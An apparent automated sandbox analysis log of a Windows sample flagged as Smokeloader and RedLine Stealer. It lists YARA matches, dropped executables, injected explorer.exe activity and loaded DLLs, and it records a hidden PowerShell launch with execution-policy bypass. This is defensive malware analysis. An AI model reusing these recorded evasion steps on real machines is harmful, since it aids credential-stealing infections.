Source: 00000004.00000002.2333549678.00000000040C1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000007.00000002.2706710751.0000000002660000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000007.00000002.2706624835.0000000002621000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.2096191047.0000000004090000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.2095808025.0000000002550000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000004.00000002.2333318255.00000000025E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.2096228733.00000000040B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000004.00000002.2333340256.00000000025F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.2096146126.000000000270D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: sashibt.2.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@23/15@16/14
Source: C:\Users\user\AppData\Local\Temp\3530.exe Code function: 8_2_00007FF7A0A0F5B0 LookupPrivilegeValueA,AdjustTokenPrivileges,OpenProcessToken, 8_2_00007FF7A0A0F5B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0271455A CreateToolhelp32Snapshot,Module32First, 0_2_0271455A
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 14_2_004E9C80 CoCreateInstance, 14_2_004E9C80
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\sashibt Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Users\user\AppData\Local\Temp\3530.exe Mutant created: \Sessions\1\BaseNamedObjects\8yUscnjrUY
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6716:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5328:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3004:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4476:120:WilError_03
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\3530.tmp Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7C81.exe File opened: C:\Windows\system32\5a55af7216446d40d953e278edaf5aa8cd73f3383fdbcf4ae41b21e0f53c23eaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Jump to behavior
Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\explorer.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM WIN32_Processor
Source: C:\Windows\explorer.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: file.exe ReversingLabs: Detection: 50%
Source: file.exe Virustotal: Detection: 42%
Source: 7C81.exe String found in binary or memory: &github.com/filecoin-project/go-address
Source: 7C81.exe String found in binary or memory: seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanL
Source: 7C81.exe String found in binary or memory: seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanL
Source: 7C81.exe String found in binary or memory: eap) is larger than maximum page size (key size not a multiple of key alignruntime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listrunti
Source: 7C81.exe String found in binary or memory: eap) is larger than maximum page size (key size not a multiple of key alignruntime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listrunti
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\sashibt C:\Users\user\AppData\Roaming\sashibt
Source: unknown Process created: C:\Users\user\AppData\Roaming\sashibt C:\Users\user\AppData\Roaming\sashibt
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\3530.exe C:\Users\user\AppData\Local\Temp\3530.exe
Source: C:\Users\user\AppData\Local\Temp\3530.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\7C81.exe C:\Users\user\AppData\Local\Temp\7C81.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\6E8A.exe C:\Users\user\AppData\Local\Temp\6E8A.exe
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Process created: C:\Users\user\AppData\Local\Temp\6E8A.exe "C:\Users\user\AppData\Local\Temp\6E8A.exe" -HOSTRUNAS
Source: C:\Users\user\AppData\Local\Temp\7C81.exe Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\3530.exe "C:\Users\user\AppData\Local\Temp\3530.exe"
Source: C:\Users\user\AppData\Local\Temp\3530.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\3530.exe "C:\Users\user\AppData\Local\Temp\3530.exe"
Source: C:\Users\user\AppData\Local\Temp\3530.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\3530.exe C:\Users\user\AppData\Local\Temp\3530.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\7C81.exe C:\Users\user\AppData\Local\Temp\7C81.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\6E8A.exe C:\Users\user\AppData\Local\Temp\6E8A.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\3530.exe "C:\Users\user\AppData\Local\Temp\3530.exe" Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\3530.exe "C:\Users\user\AppData\Local\Temp\3530.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7C81.exe Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Process created: C:\Users\user\AppData\Local\Temp\6E8A.exe "C:\Users\user\AppData\Local\Temp\6E8A.exe" -HOSTRUNAS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: msimg32.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: msvcr100.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: windows.cloudstore.schema.shell.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: wpnapps.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: cdprt.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: mfsrcsnk.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: smartscreenps.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\sashibt Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\sashibt Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\sashibt Section loaded: msimg32.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\sashibt Section loaded: msvcr100.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\sashibt Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\sashibt Section loaded: msimg32.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\sashibt Section loaded: msvcr100.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3530.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3530.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7C81.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7C81.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7C81.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: mshtml.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: srpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: msiso.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: uiautomationcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Section loaded: wintypes.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: winhttp.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: webio.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: mswsock.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: iphlpapi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: winnsi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: sspicli.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: dnsapi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: rasadhlp.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: schannel.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ntasn1.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ncrypt.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: msasn1.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: cryptsp.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: rsaenh.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: cryptbase.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: gpapi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: dpapi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: wbemcomn.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: amsi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: userenv.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: profapi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: version.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: uxtheme.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
